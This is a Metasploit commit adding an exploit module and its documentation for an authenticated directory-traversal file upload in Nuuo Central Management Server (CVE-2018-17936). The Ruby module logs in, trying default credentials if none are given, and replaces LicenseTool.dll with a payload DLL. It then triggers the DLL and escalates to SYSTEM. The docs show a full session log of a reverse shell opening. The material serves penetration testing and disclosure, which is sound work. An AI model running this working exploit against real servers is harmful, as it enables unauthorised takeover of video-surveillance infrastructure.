Land #11290, Add Nuuo CMS file upload exploit

2019-02-20 07:43:37 -06:00 · 2019-02-20 07:43:37 -06:00 · 973c7dac32
parent f6fd9efcee
commit 973c7dac32
2 changed files with 181 additions and 0 deletions
--- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md
+++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md
@ -0,0 +1,77 @@
+## Description
+
+Nuuo CMS Authenticated Arbitrary File Upload
+
+The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the CMS Server. An example is below:
+
+```
+COMMITCONFIG NUCM/1.0
+User-Session-No: <session-number>
+Filename: <filename>
+FileType: <number>
+Content-Lenght: <file-length>
+
+<FILE_DATA>
+```
+
+The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server.
+
+This vulnerability is exploitable in CMS versions up to and including v2.4.
+
+This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided.
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions below 2.5](http://d1.nuuo.com/NUUO/CMS/)
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.2 OK
+ - 2.4.0 OK
+ - 2.6.0 FAIL (vuln fixed?)
+ - 2.9.0 FAIL
+ - 2.10.0 FAIL
+
+## Scenarios
+
+### Testing on Windows 10 Pro x64 running NCS Server 2.4.0
+
+```
+msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 exploit(windows/nuuo/nuuo_cms_fu) > set verbose true
+verbose => true
+msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] 172.22.222.200:5180 - Backing up LicenseTool.dll to TQzixBdpOiRG
+[*] 172.22.222.200:5180 - Uploading payload...
+[*] 172.22.222.200:5180 - Sleeping 15 seconds...
+[*] 172.22.222.200:5180 - Sending SENDLICFILE request, shell incoming!
+[*] Sending stage (179779 bytes) to 172.22.222.200
+[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:49674) at 2019-02-19 05:46:51 -0600
+
+meterpreter > 
+[!] 172.22.222.200:5180 - Please wait a bit while we clean up
+[+] 172.22.222.200:5180 - Successfully restored LicenseTool.dll!
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+[+] 172.22.222.200:5180 - We should have SYSTEM now, enjoy your shell!
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-IPOGIJR
+OS              : Windows 10 (Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+## References
+
+https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
--- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
+++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::Nuuo
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
+      'Description'    => %q{
+      The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
+      CMS Server.
+      The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\)
+      characters. Therefore, this function can be abused to overwrite any files in the installation
+      drive of CMS Server.
+
+      This vulnerability is exploitable in CMS versions up to and including v2.4.
+
+      This module will either use a provided session number (which can be guessed with an auxiliary
+      module) or attempt to login using a provided username and password - it will also try the
+      default credentials if nothing is provided.
+
+      This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
+      fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
+      not execute successfully.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2018-17936' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
+        ],
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          [ 'Nuuo Central Management Server <= v2.4.0', {} ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Oct 11 2018',
+      'DefaultTarget'  => 0))
+  end
+
+  def on_new_session(client)
+    if client.type == 'meterpreter'
+      print_warning('Please wait a bit while we clean up')
+      client.sys.process.get_processes().each do |proc|
+        if proc['name'] == 'NCS_Server.exe'
+          client.sys.process.kill(proc['pid'])
+          Rex.sleep(5)
+          client.shell_command_token("move /y #{@dll} LicenseTool.dll")
+          client.sys.process.execute('NCS_Server.exe')
+          print_good('Successfully restored LicenseTool.dll!')
+        end
+      end
+
+      # elevate privs to system (we're already Admin anyway), and we're done!
+      client.run_cmd('getsystem')
+      print_good('We should have SYSTEM now, enjoy your shell!')
+    else
+      print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
+      print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
+      print_error('... otherwise the Nuuo CMS installation will be nuked!')
+      print_good('Anyway, enjoy your shell!')
+    end
+  end
+
+  def exploit
+    nucs_login
+
+    unless @nucs_session
+      fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
+    end
+
+    # Download and upload a backup of LicenseTool.dll, so that we can restore it at post
+    # and not nuke the CMS installation.
+    @dll = rand_text_alpha(12)
+    print_status("Backing up LicenseTool.dll to #{@dll}")
+    dll_data = nucs_download_file('LicenseTool.dll')
+    nucs_upload_file(@dll, dll_data)
+
+    print_status('Uploading payload...')
+    nucs_upload_file('LicenseTool.dll', generate_payload_dll)
+
+    print_status('Sleeping 15 seconds...')
+    Rex.sleep(15)
+
+    print_status('Sending SENDLICFILE request, shell incoming!')
+    license_data = rand_text_alpha(50..350)
+    nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic",
+      'Content-Length: ' + license_data.length.to_s], license_data)
+  end
+end